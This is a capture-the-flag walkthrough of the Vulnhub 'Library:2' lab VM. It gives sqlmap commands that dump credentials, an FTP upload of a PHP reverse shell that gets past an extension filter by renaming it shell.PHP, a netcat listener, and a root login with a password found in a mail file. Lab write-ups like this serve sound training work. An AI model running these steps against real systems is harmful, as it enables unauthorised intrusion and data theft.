The Library:2 Vulnhub Walkthrough
Today we are going to take another challenge Library2 which is a 2nd lab of the series Library. The credit for making this VM machine goes to “Avraham Cohen” and it is a boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.
Security Level: Beginner
- Web Directory Search
- Shell Upload
- Obtaining root password
Let’s start off with the scanning process. This target VM took the IP address of 192.168.1.107 automatically from our local Wi-Fi network.
We used Nmap for port scanning. We found that port 21 and 80 are open.
nmap -A 192.168.1.107
As we can see port 80 is open, we opened the IP address in our browser, but we didn’t find anything useful on the webpage.
Firstly, we tried dirb in default mode but didn’t find any directory. Then we looked with .php extension and got one directory /library.php
dirb http://192.168.1.107 -X .php
After accessing the URL http://192.168.1.107/library.php we got a webpage listing the name of few countries.
We just clicked on Netherlands and it didn’t give any information.
We captured the request in burpsuite and thought country parameter might be vulnerable to SQL injection, so we copied the raw request of burp into a text file sql and used an asterisk (*) to pinpoint our point of the target but we didn’t get anything.
Then we took a little help of the hint given by the creator of this machine on Vulnhub and changed the request from GET to POST.
You can see in the image below the request has been changed from GET to POST. Copy this request in a text file on your attacking machine.
Now let’s use sqlmap on the file where we have copied the POST request in a text file.
sqlmap -r sql --dbs --batch --risk 3 --level 5
From the results, we found a directory named library.
Further enumerating the library database for usernames and passwords.
sqlmap -r sql -D library --dump-all --batch --risk 3 --level 5
We found a username globus and password AroundTheWorld for the ftp service.
We connected to the target system through ftp using the above-found credentials. We looked here and there but couldn’t find anything useful, so what we did is we grabbed a php-reverse-shell from /usr/share/webshells/php and modified the listener IP as ours and named it as shell.php.
Then we tried to upload it in the target machine using PUT command but we got access denied error.
ftp 192.168.1.107 ls cd html ls put shell.php
It seemed there was some sort of file format filtering happening in the backend, we found a work around for this filter by changing the name of the script file from shell.php to shell.PHP
put shell.PHP ls chmod 777 shell.PHP
Now we executed the shell by just browsing to the URL http://192.168.1.107/shell.PHP and at the same time started a netcat listener on our Kali machine.
We successfully got the netcat session with a limited user privilege. And after a little bit of directory traversing, we found the password of a root inside a file named welcome located in the /var/mail directory.
Then we finally switched to the root shell using su command and successfully completed the challenge.
nc –lvp 1234 python -c 'import pty; pty.spawn("/bin/sh")' cd /var/mail ls cat welcome su root id
Author: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here